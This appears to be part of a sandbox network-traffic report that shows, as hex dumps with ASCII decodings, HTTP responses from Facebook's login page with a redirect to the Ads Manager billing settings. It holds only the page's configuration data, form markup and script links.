                                                                                                                                  2022-10-17 20:07:20 UTC1078INData Raw: 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22
                                                                                                                                  Data Ascii: er\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"
                                                                                                                                  2022-10-17 20:07:20 UTC1079INData Raw: 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 34 30 34 34 34 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 30 34 32 35 2e 35 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 30 34 32 35 2e 35 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22
                                                                                                                                  Data Ascii: urn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037240444,"timeOfRequestStart":1666037240425.5,"timeOfResponseStart":1666037240425.5},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"
                                                                                                                                  2022-10-17 20:07:20 UTC1081INData Raw: 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22
                                                                                                                                  Data Ascii: h5DD1A"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"
                                                                                                                                  2022-10-17 20:07:20 UTC1082INData Raw: 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d
                                                                                                                                  Data Ascii: seover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{}
                                                                                                                                  2022-10-17 20:07:20 UTC1084INData Raw: 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 6d 71 36 6d 4f 76 59 54 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 34 30 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30
                                                                                                                                  Data Ascii: - _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="mq6mOvYT">requireLazy(["bootstrapWebSession"],function(j){j(1666037240)})</script><div class="_li" id="u_0_0
                                                                                                                                  2022-10-17 20:07:20 UTC1085INData Raw: 66 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65
                                                                                                                                  Data Ascii: f" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_se
                                                                                                                                  2022-10-17 20:07:20 UTC1087INData Raw: 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72
                                                                                                                                  Data Ascii: iv></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a hr
                                                                                                                                  2022-10-17 20:07:20 UTC1088INData Raw: 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d
                                                                                                                                  Data Ascii: return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=
                                                                                                                                  2022-10-17 20:07:20 UTC1090INData Raw: 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74
                                                                                                                                  Data Ascii: ok.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=htt
                                                                                                                                  2022-10-17 20:07:20 UTC1091INData Raw: 6f 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63
                                                                                                                                  Data Ascii: ortugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoc
                                                                                                                                  2022-10-17 20:07:20 UTC1093INData Raw: 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63
                                                                                                                                  Data Ascii: uot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onc
                                                                                                                                  2022-10-17 20:07:20 UTC1094INData Raw: 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69
                                                                                                                                  Data Ascii: \u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxi
                                                                                                                                  2022-10-17 20:07:20 UTC1096INData Raw: 2f 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46
                                                                                                                                  Data Ascii: //www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2F
                                                                                                                                  2022-10-17 20:07:20 UTC1097INData Raw: 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61
                                                                                                                                  Data Ascii: ooter" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a
                                                                                                                                  2022-10-17 20:07:20 UTC1098INData Raw: 22 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61
                                                                                                                                  Data Ascii: " width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpDa
                                                                                                                                  2022-10-17 20:07:20 UTC1100INData Raw: 31 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 79 36 30 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 68 65 63 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 46 2d 34 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 4c 57 34 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37
                                                                                                                                  Data Ascii: 1840809":{"result":false,"hash":"AT5nYctoTsr7alRiy60"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZhec"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlmF-4"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpLW4"},"5541":{"result":true,"hash":"AT7
                                                                                                                                  2022-10-17 20:07:20 UTC1101INData Raw: 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73
                                                                                                                                  Data Ascii: tps:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/s
                                                                                                                                  2022-10-17 20:07:20 UTC1103INData Raw: 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33
                                                                                                                                  Data Ascii: .php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3
                                                                                                                                  2022-10-17 20:07:20 UTC1104INData Raw: 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6b
